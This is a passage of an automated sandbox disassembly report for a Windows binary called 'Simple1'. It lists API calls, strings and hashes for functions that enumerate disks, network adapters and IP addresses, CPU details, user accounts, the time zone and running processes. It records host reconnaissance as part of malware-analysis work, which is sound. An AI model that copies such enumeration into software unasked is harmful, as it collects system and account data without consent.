              • Part of subcall function 00007FF71E3999F0: ?_Osfx@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAXXZ.MSVCP140(?,00000000,00000000,?,00007FF71E3919FA), ref: 00007FF71E399B90
            • GetDiskFreeSpaceExA.KERNELBASE ref: 00007FF71E3938F6
            • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_K@Z.MSVCP140 ref: 00007FF71E39392B
            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF71E3939D7
            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF71E3939DE
            • ??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UEAA@XZ.MSVCP140 ref: 00007FF71E393A59
            • ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA@XZ.MSVCP140 ref: 00007FF71E393A63
              • Part of subcall function 00007FF71E399610: memcpy.VCRUNTIME140(?,?,?,?,?,00007FF71E391CCF), ref: 00007FF71E399656
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.2425312486.00007FF71E391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71E390000, based on PE: true
            • Associated: 00000000.00000002.2425300924.00007FF71E390000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2425325471.00007FF71E39E000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2425340860.00007FF71E3A5000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2425358136.00007FF71E3A6000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7ff71e390000_Simple1.jbxd
            Similarity
            • API ID: U?$char_traits@$D@std@@@std@@$U?$char_traits@_W@std@@@std@@$?good@ios_base@std@@_invalid_parameter_noinfo_noreturn$??0?$basic_ios@??0?$basic_iostream@??0?$basic_streambuf@??1?$basic_ios@??1?$basic_iostream@??6?$basic_ostream@?flush@?$basic_ostream@_?setstate@?$basic_ios@_?uncaught_exception@std@@D@std@@@1@@DiskDrivesFreeLogicalOsfx@?$basic_ostream@_SpaceV01@_V12@V?$basic_streambuf@memcpymemset
            • String ID: GB$Available Drives:
            • API String ID: 2435906160-4081138596
            • Opcode ID: 873d8ed40e66d254b1fef8beee453d05849ea1a5f11feba2a669130287f0c7f9
            • Instruction ID: 5376f500f802d969040a49a2e479404a35ba500bd40eab53d07238567a55c70b
            • Opcode Fuzzy Hash: 873d8ed40e66d254b1fef8beee453d05849ea1a5f11feba2a669130287f0c7f9
            • Instruction Fuzzy Hash: B591D662A18F8285EB20DF25D4403BDB760FB857A4F90523AEA8D177A5DF3CE189C710

            Control-flow Graph

            APIs
            • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF71E393AEB
            • memset.VCRUNTIME140 ref: 00007FF71E393B01
              • Part of subcall function 00007FF71E396810: ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IEAA@XZ.MSVCP140 ref: 00007FF71E39684A
              • Part of subcall function 00007FF71E396810: ??0?$basic_iostream@DU?$char_traits@D@std@@@std@@QEAA@PEAV?$basic_streambuf@DU?$char_traits@D@std@@@1@@Z.MSVCP140 ref: 00007FF71E396866
              • Part of subcall function 00007FF71E396810: ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAA@XZ.MSVCP140 ref: 00007FF71E396898
            • GetAdaptersInfo.IPHLPAPI ref: 00007FF71E393B19
            • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF71E393B28
            • GetAdaptersInfo.IPHLPAPI ref: 00007FF71E393B39
            • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF71E393BC0
            • ??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UEAA@XZ.MSVCP140 ref: 00007FF71E393C8E
            • ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA@XZ.MSVCP140 ref: 00007FF71E393C98
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.2425312486.00007FF71E391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71E390000, based on PE: true
            • Associated: 00000000.00000002.2425300924.00007FF71E390000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2425325471.00007FF71E39E000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2425340860.00007FF71E3A5000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2425358136.00007FF71E3A6000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7ff71e390000_Simple1.jbxd
            Similarity
            • API ID: U?$char_traits@$D@std@@@std@@$AdaptersInfomalloc$??0?$basic_ios@??0?$basic_iostream@??0?$basic_streambuf@??1?$basic_ios@??1?$basic_iostream@D@std@@@1@@V?$basic_streambuf@freememset
            • String ID: Adapter: $IP Address:
            • API String ID: 1136092572-1613687433
            • Opcode ID: c7edc62ba95c09bb25c762d494fc7f04a23de319ef8496f2bf0b1d9de3c27718
            • Instruction ID: 8b33e683718c57039d57acd826cb3913a973a486971f870bd00fd9a2dcdd2c2a
            • Opcode Fuzzy Hash: c7edc62ba95c09bb25c762d494fc7f04a23de319ef8496f2bf0b1d9de3c27718
            • Instruction Fuzzy Hash: D4519172A19F8281EB10EB56D4402BEA3A1FB84BA4F84513AEE4D07B55DF3CF549C720

            Control-flow Graph

            APIs
            • GetSystemInfo.KERNELBASE ref: 00007FF71E39359E
            • memset.VCRUNTIME140 ref: 00007FF71E3935B0
              • Part of subcall function 00007FF71E396810: ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IEAA@XZ.MSVCP140 ref: 00007FF71E39684A
              • Part of subcall function 00007FF71E396810: ??0?$basic_iostream@DU?$char_traits@D@std@@@std@@QEAA@PEAV?$basic_streambuf@DU?$char_traits@D@std@@@1@@Z.MSVCP140 ref: 00007FF71E396866
              • Part of subcall function 00007FF71E396810: ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAA@XZ.MSVCP140 ref: 00007FF71E396898
              • Part of subcall function 00007FF71E3999F0: ?good@ios_base@std@@QEBA_NXZ.MSVCP140(?,?,00000000,00000000,?,00007FF71E3919FA), ref: 00007FF71E399A69
              • Part of subcall function 00007FF71E3999F0: ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV12@XZ.MSVCP140(?,00000000,00000000,?,00007FF71E3919FA), ref: 00007FF71E399A89
              • Part of subcall function 00007FF71E3999F0: ?good@ios_base@std@@QEBA_NXZ.MSVCP140(?,00000000,00000000,?,00007FF71E3919FA), ref: 00007FF71E399A99
              • Part of subcall function 00007FF71E3999F0: ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QEAAXH_N@Z.MSVCP140(?,00000000,00000000,?,00007FF71E3919FA), ref: 00007FF71E399B7C
              • Part of subcall function 00007FF71E3999F0: ?uncaught_exception@std@@YA_NXZ.MSVCP140(?,00000000,00000000,?,00007FF71E3919FA), ref: 00007FF71E399B83
              • Part of subcall function 00007FF71E3999F0: ?_Osfx@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAXXZ.MSVCP140(?,00000000,00000000,?,00007FF71E3919FA), ref: 00007FF71E399B90
            • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@G@Z.MSVCP140 ref: 00007FF71E3935D7
              • Part of subcall function 00007FF71E3999F0: ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140(?,00000000,00000000,?,00007FF71E3919FA), ref: 00007FF71E399AE6
              • Part of subcall function 00007FF71E3999F0: ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAA_JPEBD_J@Z.MSVCP140(?,00000000,00000000,?,00007FF71E3919FA), ref: 00007FF71E399B0F
              • Part of subcall function 00007FF71E3999F0: ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140(?,00000000,00000000,?,00007FF71E3919FA), ref: 00007FF71E399B36
            • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@K@Z.MSVCP140 ref: 00007FF71E393603
            • ??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UEAA@XZ.MSVCP140 ref: 00007FF71E3936DC
            • ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA@XZ.MSVCP140 ref: 00007FF71E3936E6
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.2425312486.00007FF71E391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71E390000, based on PE: true
            • Associated: 00000000.00000002.2425300924.00007FF71E390000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2425325471.00007FF71E39E000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2425340860.00007FF71E3A5000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2425358136.00007FF71E3A6000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7ff71e390000_Simple1.jbxd
            Similarity
            • API ID: U?$char_traits@$D@std@@@std@@$U?$char_traits@_W@std@@@std@@$??6?$basic_ostream@?good@ios_base@std@@?sputc@?$basic_streambuf@V01@$??0?$basic_ios@??0?$basic_iostream@??0?$basic_streambuf@??1?$basic_ios@??1?$basic_iostream@?flush@?$basic_ostream@_?setstate@?$basic_ios@_?sputn@?$basic_streambuf@?uncaught_exception@std@@D@std@@@1@@InfoOsfx@?$basic_ostream@_SystemV12@V?$basic_streambuf@memset
            • String ID: Number of Cores: $Processor Architecture:
            • API String ID: 777187999-1490948189
            • Opcode ID: f08b80ed4651fb83f797399b275d32309c9e16663fecaf2ac744f9129df82a99
            • Instruction ID: 9438a6450d2ce3fcd73f9e690f33bc911401fcd4cc03f4810220c9516ba1353d
            • Opcode Fuzzy Hash: f08b80ed4651fb83f797399b275d32309c9e16663fecaf2ac744f9129df82a99
            • Instruction Fuzzy Hash: 9A51C262A08F4189EB10EF25D8802EDB3B0FB84B98F84413ADA4D17769DF3CE548C750

            Control-flow Graph

            APIs
            • memset.VCRUNTIME140 ref: 00007FF71E393D2C
              • Part of subcall function 00007FF71E396810: ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IEAA@XZ.MSVCP140 ref: 00007FF71E39684A
              • Part of subcall function 00007FF71E396810: ??0?$basic_iostream@DU?$char_traits@D@std@@@std@@QEAA@PEAV?$basic_streambuf@DU?$char_traits@D@std@@@1@@Z.MSVCP140 ref: 00007FF71E396866
              • Part of subcall function 00007FF71E396810: ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAA@XZ.MSVCP140 ref: 00007FF71E396898
            • NetUserEnum.NETAPI32 ref: 00007FF71E393D6B
            • NetApiBufferFree.NETAPI32 ref: 00007FF71E393E4A
            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF71E393E9F
            • ??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UEAA@XZ.MSVCP140 ref: 00007FF71E393F1A
            • ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA@XZ.MSVCP140 ref: 00007FF71E393F24
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.2425312486.00007FF71E391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71E390000, based on PE: true
            • Associated: 00000000.00000002.2425300924.00007FF71E390000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2425325471.00007FF71E39E000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2425340860.00007FF71E3A5000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2425358136.00007FF71E3A6000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7ff71e390000_Simple1.jbxd
            Similarity
            • API ID: U?$char_traits@$D@std@@@std@@$??0?$basic_ios@??0?$basic_iostream@??0?$basic_streambuf@??1?$basic_ios@??1?$basic_iostream@BufferD@std@@@1@@EnumFreeUserV?$basic_streambuf@_invalid_parameter_noinfo_noreturnmemset
            • String ID: User:
            • API String ID: 429987867-381282118
            • Opcode ID: f38195159ee3f469c25e5ed70778729cee69e86cdd66aa19a02179a8398c8ef7
            • Instruction ID: 5a62c2a5c23e482970af78d53906637e0f73e7e6b1a34d797b2cfc53a2f13414
            • Opcode Fuzzy Hash: f38195159ee3f469c25e5ed70778729cee69e86cdd66aa19a02179a8398c8ef7
            • Instruction Fuzzy Hash: DA719372A08F8186EB10EF65D4402ADB7A0FB857A4F905139EB4D13B69DF3CE489CB10
            APIs
            • GetTimeZoneInformation.KERNELBASE ref: 00007FF71E3941BD
            • memset.VCRUNTIME140 ref: 00007FF71E3941D0
              • Part of subcall function 00007FF71E396810: ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IEAA@XZ.MSVCP140 ref: 00007FF71E39684A
              • Part of subcall function 00007FF71E396810: ??0?$basic_iostream@DU?$char_traits@D@std@@@std@@QEAA@PEAV?$basic_streambuf@DU?$char_traits@D@std@@@1@@Z.MSVCP140 ref: 00007FF71E396866
              • Part of subcall function 00007FF71E396810: ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAA@XZ.MSVCP140 ref: 00007FF71E396898
            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF71E39427D
            • ??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UEAA@XZ.MSVCP140 ref: 00007FF71E394351
            • ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA@XZ.MSVCP140 ref: 00007FF71E39435B
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.2425312486.00007FF71E391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71E390000, based on PE: true
            • Associated: 00000000.00000002.2425300924.00007FF71E390000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2425325471.00007FF71E39E000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2425340860.00007FF71E3A5000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2425358136.00007FF71E3A6000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7ff71e390000_Simple1.jbxd
            Similarity
            • API ID: U?$char_traits@$D@std@@@std@@$??0?$basic_ios@??0?$basic_iostream@??0?$basic_streambuf@??1?$basic_ios@??1?$basic_iostream@D@std@@@1@@InformationTimeV?$basic_streambuf@Zone_invalid_parameter_noinfo_noreturnmemset
            • String ID: Time Zone:
            • API String ID: 35776714-1239252231
            • Opcode ID: 4a3cfc00f54bd0dcd01bff2b18e0fa9e16f3ef621efc6b743468659904009485
            • Instruction ID: bed8a0f1a121990539154dbb20f0378de330d36c673bbe283ac32e3c6d80e72e
            • Opcode Fuzzy Hash: 4a3cfc00f54bd0dcd01bff2b18e0fa9e16f3ef621efc6b743468659904009485
            • Instruction Fuzzy Hash: 3F51C872A18F8585EB20EF65E4802EDA371FB947A4F84413AEA8D03759DF7CE589C710

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 933 7ff71e391820-7ff71e39186f memset 934 7ff71e391871 933->934 935 7ff71e391874-7ff71e3918ae call 7ff71e3989e0 933->935 934->935 938 7ff71e3918b0-7ff71e391901 call 7ff71e3999f0 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z 935->938 939 7ff71e391906-7ff71e391941 ?tellg@?$basic_istream@DU?$char_traits@D@std@@@std@@QEAA?AV?$fpos@U_Mbstatet@@@2@XZ ?seekg@?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV12@_JH@Z 935->939 949 7ff71e391a7e-7ff71e391ac6 call 7ff71e397530 ??1?$basic_istream@DU?$char_traits@D@std@@@std@@UEAA@XZ ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA@XZ call 7ff71e39b4e0 938->949 941 7ff71e391943-7ff71e391950 939->941 942 7ff71e3919b8-7ff71e3919bd 939->942 945 7ff71e391956-7ff71e39195d 941->945 946 7ff71e391acd-7ff71e391b3a call 7ff71e39b060 call 7ff71e397530 ??1?$basic_istream@DU?$char_traits@D@std@@@std@@UEAA@XZ ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA@XZ 941->946 943 7ff71e3919c2-7ff71e3919e5 ?read@?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV12@PEAD_J@Z ??7ios_base@std@@QEBA_NXZ 942->943 947 7ff71e391a52-7ff71e391a59 943->947 948 7ff71e3919e7-7ff71e391a18 call 7ff71e3999f0 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z 943->948 951 7ff71e39195f-7ff71e391966 945->951 952 7ff71e391988-7ff71e391990 call 7ff71e39b508 945->952 953 7ff71e391a5d-7ff71e391a7a 947->953 948->953 969 7ff71e391a1a-7ff71e391a27 948->969 958 7ff71e391ac7-7ff71e391acc call 7ff71e391270 951->958 959 7ff71e39196c call 7ff71e39b508 951->959 966 7ff71e391993-7ff71e3919b6 memset 952->966 953->949 958->946 971 7ff71e391971-7ff71e391974 959->971 966->943 973 7ff71e391a45-7ff71e391a50 call 7ff71e39b500 969->973 974 7ff71e391a29-7ff71e391a3c 969->974 975 7ff71e39197a-7ff71e391986 971->975 976 7ff71e391a3e-7ff71e391a44 _invalid_parameter_noinfo_noreturn 971->976 973->953 974->973 974->976 975->966 976->973
            APIs
            • memset.VCRUNTIME140 ref: 00007FF71E391865
            • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF71E3918CD
            • ?tellg@?$basic_istream@DU?$char_traits@D@std@@@std@@QEAA?AV?$fpos@U_Mbstatet@@@2@XZ.MSVCP140 ref: 00007FF71E391910
            • ?seekg@?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV12@_JH@Z.MSVCP140 ref: 00007FF71E391927
            • memset.VCRUNTIME140 ref: 00007FF71E3919A9
              • Part of subcall function 00007FF71E39B508: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF71E39107B), ref: 00007FF71E39B522
            • ?read@?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV12@PEAD_J@Z.MSVCP140 ref: 00007FF71E3919CD
            • ??7ios_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF71E3919DD
            • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF71E391A04
            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF71E391A3E
            • ??1?$basic_istream@DU?$char_traits@D@std@@@std@@UEAA@XZ.MSVCP140 ref: 00007FF71E391A8D
            • ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA@XZ.MSVCP140 ref: 00007FF71E391A97
            • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF71E391AC7
            • ??1?$basic_istream@DU?$char_traits@D@std@@@std@@UEAA@XZ.MSVCP140 ref: 00007FF71E391B2C
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.2425312486.00007FF71E391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71E390000, based on PE: true
            • Associated: 00000000.00000002.2425300924.00007FF71E390000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2425325471.00007FF71E39E000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2425340860.00007FF71E3A5000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2425358136.00007FF71E3A6000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7ff71e390000_Simple1.jbxd
            Similarity
            • API ID: D@std@@@std@@U?$char_traits@$V01@$??1?$basic_istream@??6?$basic_ostream@V01@@memset$??1?$basic_ios@??7ios_base@std@@?read@?$basic_istream@?seekg@?$basic_istream@?tellg@?$basic_istream@Concurrency::cancel_current_taskMbstatet@@@2@V12@V12@_V?$fpos@_invalid_parameter_noinfo_noreturnmalloc
            • String ID: Couldn't open the file$Couldn't read the file
            • API String ID: 2898521299-2967168750
            • Opcode ID: 0275003dcb37a20596c6dc6a177c6187be1fcbe42ac24130b3cfcc419d978cd0
            • Instruction ID: 4e6b1af45fd57733edeb5d85d88e654bb65e74677a67047be40e7ee2ce37d479
            • Opcode Fuzzy Hash: 0275003dcb37a20596c6dc6a177c6187be1fcbe42ac24130b3cfcc419d978cd0
            • Instruction Fuzzy Hash: A5917F32A08F8591EB10EF16E8442ADB3A1FB85BA4F954639DE5D077A4DF3CE449C720

            Control-flow Graph

            APIs
            • ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IEAA@XZ.MSVCP140(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF71E391881), ref: 00007FF71E398A20
            • ??0?$basic_istream@DU?$char_traits@D@std@@@std@@QEAA@PEAV?$basic_streambuf@DU?$char_traits@D@std@@@1@_N@Z.MSVCP140 ref: 00007FF71E398A3F
            • ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAA@XZ.MSVCP140 ref: 00007FF71E398A71
            • ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAAXXZ.MSVCP140 ref: 00007FF71E398A8C
            • ?_Fiopen@std@@YAPEAU_iobuf@@PEB_WHH@Z.MSVCP140 ref: 00007FF71E398AB6
            • ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAAXXZ.MSVCP140 ref: 00007FF71E398AD3
            • _get_stream_buffer_pointers.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF71E398AFA
            • ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAAXPEAPEAD0PEAH001@Z.MSVCP140 ref: 00007FF71E398B21
            • ?getloc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEBA?AVlocale@2@XZ.MSVCP140 ref: 00007FF71E398B45
              • Part of subcall function 00007FF71E399FB0: ??0_Lockit@std@@QEAA@H@Z.MSVCP140 ref: 00007FF71E399FDD
              • Part of subcall function 00007FF71E399FB0: ??Bid@locale@std@@QEAA_KXZ.MSVCP140 ref: 00007FF71E399FF7
              • Part of subcall function 00007FF71E399FB0: ?_Getgloballocale@locale@std@@CAPEAV_Locimp@12@XZ.MSVCP140 ref: 00007FF71E39A029
              • Part of subcall function 00007FF71E399FB0: ?_Getcat@?$codecvt@DDU_Mbstatet@@@std@@SA_KPEAPEBVfacet@locale@2@PEBV42@@Z.MSVCP140 ref: 00007FF71E39A054
              • Part of subcall function 00007FF71E399FB0: std::_Facet_Register.LIBCPMT ref: 00007FF71E39A06D
              • Part of subcall function 00007FF71E399FB0: ??1_Lockit@std@@QEAA@XZ.MSVCP140 ref: 00007FF71E39A08C
            • ?always_noconv@codecvt_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF71E398B5A
            • ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAAXXZ.MSVCP140 ref: 00007FF71E398B71
            • ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QEAAXH_N@Z.MSVCP140 ref: 00007FF71E398BB0
            Memory Dump Source
            • Source File: 00000000.00000002.2425312486.00007FF71E391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71E390000, based on PE: true
            • Associated: 00000000.00000002.2425300924.00007FF71E390000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2425325471.00007FF71E39E000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2425340860.00007FF71E3A5000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2425358136.00007FF71E3A6000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7ff71e390000_Simple1.jbxd
            Similarity
            • API ID: U?$char_traits@$D@std@@@std@@$Init@?$basic_streambuf@$Lockit@std@@$??0?$basic_ios@??0?$basic_istream@??0?$basic_streambuf@??0_??1_?always_noconv@codecvt_base@std@@?getloc@?$basic_streambuf@?setstate@?$basic_ios@_Bid@locale@std@@D@std@@@1@_Facet_Fiopen@std@@Getcat@?$codecvt@Getgloballocale@locale@std@@H001@Locimp@12@Mbstatet@@@std@@RegisterU?$char_traits@_U_iobuf@@V42@@V?$basic_streambuf@Vfacet@locale@2@Vlocale@2@W@std@@@std@@_get_stream_buffer_pointersstd::_
            • String ID:
            • API String ID: 3818078705-0
            • Opcode ID: f35c13acc3d87238f3b7b1e58bee0d7e5fa0656072ccc1d0c3963a8712f1ca8d
            • Instruction ID: ac0549be67e5adde825f9778f3443a9a1a7e63b09489fc87ceb50e07cf5a1e15
            • Opcode Fuzzy Hash: f35c13acc3d87238f3b7b1e58bee0d7e5fa0656072ccc1d0c3963a8712f1ca8d
            • Instruction Fuzzy Hash: B5512A32608F8596EB009F26E554369B7A0FB85BA5F844039DB8E43B64DF3CF069C720

            Control-flow Graph

            APIs
            Memory Dump Source
            • Source File: 00000000.00000002.2425312486.00007FF71E391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71E390000, based on PE: true
            • Associated: 00000000.00000002.2425300924.00007FF71E390000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2425325471.00007FF71E39E000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2425340860.00007FF71E3A5000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2425358136.00007FF71E3A6000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7ff71e390000_Simple1.jbxd
            Similarity
            • API ID: U?$char_traits@$D@std@@@std@@$EnumProcessmemset$??0?$basic_ios@??0?$basic_iostream@??0?$basic_streambuf@??1?$basic_ios@??1?$basic_iostream@BaseCloseD@std@@@1@@HandleModuleModulesNameOpenProcessesV?$basic_streambuf@memcpy
            • String ID:
            • API String ID: 3444793848-0
            • Opcode ID: 42b6029e3a9adb14015d90267ca1e11476e9fbeef03a5cae2e6db4e706ef6174
            • Instruction ID: f68f56a23a37201c4fc7a9238229e0fbc10348bebde3b804c0ce6035b532e949
            • Opcode Fuzzy Hash: 42b6029e3a9adb14015d90267ca1e11476e9fbeef03a5cae2e6db4e706ef6174
            • Instruction Fuzzy Hash: 5B717372618F8586EB20EF66D4802ADA3B1FB85B94F84413AEE8D53B54DF3CE549C710

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 1197 7ff71e399c10-7ff71e399c3f 1198 7ff71e399c40-7ff71e399c48 1197->1198 1198->1198 1199 7ff71e399c4a-7ff71e399c59 1198->1199 1200 7ff71e399c65 1199->1200 1201 7ff71e399c5b-7ff71e399c5e 1199->1201 1203 7ff71e399c67-7ff71e399c77 1200->1203 1201->1200 1202 7ff71e399c60-7ff71e399c63 1201->1202 1202->1203 1204 7ff71e399c80-7ff71e399c92 ?good@ios_base@std@@QEBA_NXZ 1203->1204 1205 7ff71e399c79-7ff71e399c7f 1203->1205 1206 7ff71e399cc4-7ff71e399cca 1204->1206 1207 7ff71e399c94-7ff71e399ca3 1204->1207 1205->1204 1211 7ff71e399cd6-7ff71e399cef 1206->1211 1212 7ff71e399ccc-7ff71e399cd1 1206->1212 1209 7ff71e399cc2 1207->1209 1210 7ff71e399ca5-7ff71e399ca8 1207->1210 1209->1206 1210->1209 1216 7ff71e399caa-7ff71e399cc0 ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV12@XZ ?good@ios_base@std@@QEBA_NXZ 1210->1216 1214 7ff71e399d1f-7ff71e399d3a ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAA_JPEBD_J@Z 1211->1214 1215 7ff71e399cf1-7ff71e399cf4 1211->1215 1213 7ff71e399d8e-7ff71e399dac ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QEAAXH_N@Z ?uncaught_exception@std@@YA_NXZ 1212->1213 1218 7ff71e399db8-7ff71e399dc8 1213->1218 1219 7ff71e399dae-7ff71e399db7 ?_Osfx@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAXXZ 1213->1219 1220 7ff71e399d67 1214->1220 1221 7ff71e399d3c 1214->1221 1215->1214 1217 7ff71e399cf6-7ff71e399d11 ?sputc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QEAAG_W@Z 1215->1217 1216->1206 1222 7ff71e399d13-7ff71e399d18 1217->1222 1223 7ff71e399d1a-7ff71e399d1d 1217->1223 1224 7ff71e399dd1-7ff71e399deb 1218->1224 1225 7ff71e399dca-7ff71e399dd0 1218->1225 1219->1218 1227 7ff71e399d6a 1220->1227 1226 7ff71e399d40-7ff71e399d43 1221->1226 1222->1227 1223->1215 1225->1224 1228 7ff71e399d45-7ff71e399d60 ?sputc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QEAAG_W@Z 1226->1228 1229 7ff71e399d6e-7ff71e399d7e 